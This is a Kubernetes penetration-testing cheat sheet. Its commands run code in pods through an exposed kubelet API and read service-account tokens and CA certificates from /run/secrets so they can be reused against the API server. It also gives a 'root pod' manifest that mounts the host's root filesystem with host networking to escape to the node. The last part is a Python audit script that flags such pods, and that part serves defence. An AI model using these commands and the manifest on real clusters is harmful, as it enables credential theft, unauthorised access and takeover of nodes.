# Kubernetes

## 00. Basic

* Default ports

| Port Range  | Purpose                 | Used By              |
| ----------- | ----------------------- | -------------------- |
| 6443        | Kubernetes API server   | All                  |
| 2379-2380   | etcd server client API  | kube-apiserver, etcd |
| 10250       | Kubelet API             | Self, Control plane  |
| 10259       | kube-scheduler          | Self                 |
| 10257       | kube-controller-manager | Self                 |
| 30000-32767 | NodePort Services       | All                  |

* kubectl

```bash
## ------------------| Basic Information
kubectl --server <IP> get pod
kubectl --server <IP> cluster-info
kubectl --server <IP> get namespaces
kubectl --server <IP> auth can-i --list
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
```

* kubelet \[[kubeletctl](https://github.com/cyberark/kubeletctl)]

```bash
## ------------------| list all the pods on the node
kubeletctl pods -s <IP>

## ------------------| list all the running pods
kubeletctl runningpods -s <IP>
kubeletctl runningpods -s <IP> | jq -c '.items[].metadata | [.name, .namespace]'
## Check what's not in the kube-system namespace

## ------------------| Execute commands
kubeletctl -s <IP> exec "id" -p <PodName> -c <ContainerName>

## ------------------| Auth to Kubernetes API
# /run/secrets/kubernetes.io/serviceaccount
# /var/run/secrets/kubernetes.io/serviceaccount
# /secrets/kubernetes.io/serviceaccount
kubeletctl -s <IP> exec "ls /run/secrets/kubernetes.io/serviceaccount" -p <PodName> -c <ContainerName>
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <PodName> -c <ContainerName> | tee ca.crt
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p <PodName> -c <ContainerName> | tee token
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
```

* Create root pod

```yaml
## ------------------| YAML skeleton
apiVersion: v1
kind: Pod
metadata:
  name: h4rithd
  namespace: default
spec:
  containers:
  - name: h4rithd
    image: nginx:1.14.2 # Use this to get the version: kubectl get pod nginx -o yaml --server <IP>
    volumeMounts:
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
```

```bash
## ------------------| Start the pod
kubectl apply -f skeleton.yaml --server <IP>

kubeletctl exec "ls /mnt/" -s <IP> -p h4rithd -c h4rithd
```
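
* Audit for pods like the one above (added example, not part of the original page): flags the three settings the skeleton relies on, `hostPath` volumes, `hostNetwork`, and a service account token that is not disabled in the pod spec. The function names, finding strings and the `web`/`shop` pod are assumptions; the sample input is constructed.

```python
import json

# Constructed sample shaped like `kubectl get pods -A -o json` (not real output).
SAMPLE = json.loads("""
{"items": [
 {"metadata": {"name": "h4rithd", "namespace": "default"},
  "spec": {"hostNetwork": true, "automountServiceAccountToken": true,
   "containers": [{"name": "h4rithd", "image": "nginx:1.14.2",
     "volumeMounts": [{"name": "hostfs", "mountPath": "/mnt"}]}],
   "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}]}},
 {"metadata": {"name": "web", "namespace": "shop"},
  "spec": {"automountServiceAccountToken": false,
   "containers": [{"name": "web", "image": "nginx:1.14.2"}]}}
]}""")


def audit_pod(pod):
    """Return findings for the host-access settings the root pod relies on."""
    spec, findings = pod.get("spec", {}), []
    # hostPath volumes expose node files; report each container that mounts one.
    host_vols = {v["name"]: v["hostPath"].get("path", "")
                 for v in spec.get("volumes", []) if "hostPath" in v}
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for m in c.get("volumeMounts", []):
            if m["name"] in host_vols:
                mode = "ro" if m.get("readOnly") else "rw"
                findings.append(f"hostPath {host_vols[m['name']]} -> "
                                f"{c['name']}:{m['mountPath']} ({mode})")
    if spec.get("hostNetwork"):
        findings.append("hostNetwork")
    # Unset defers to the ServiceAccount (mounted by default); require explicit false.
    if spec.get("automountServiceAccountToken") is not False:
        findings.append("serviceaccount token not disabled in pod spec")
    return findings


def audit(pod_list):
    """Map 'namespace/name' to findings for every pod that has any."""
    report = {}
    for pod in pod_list.get("items", []):
        meta, found = pod["metadata"], audit_pod(pod)
        if found:
            report[f"{meta.get('namespace', 'default')}/{meta['name']}"] = found
    return report


if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE), indent=2))
```

To audit a cluster, load the output of `kubectl get pods -A -o json` in place of `SAMPLE`.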

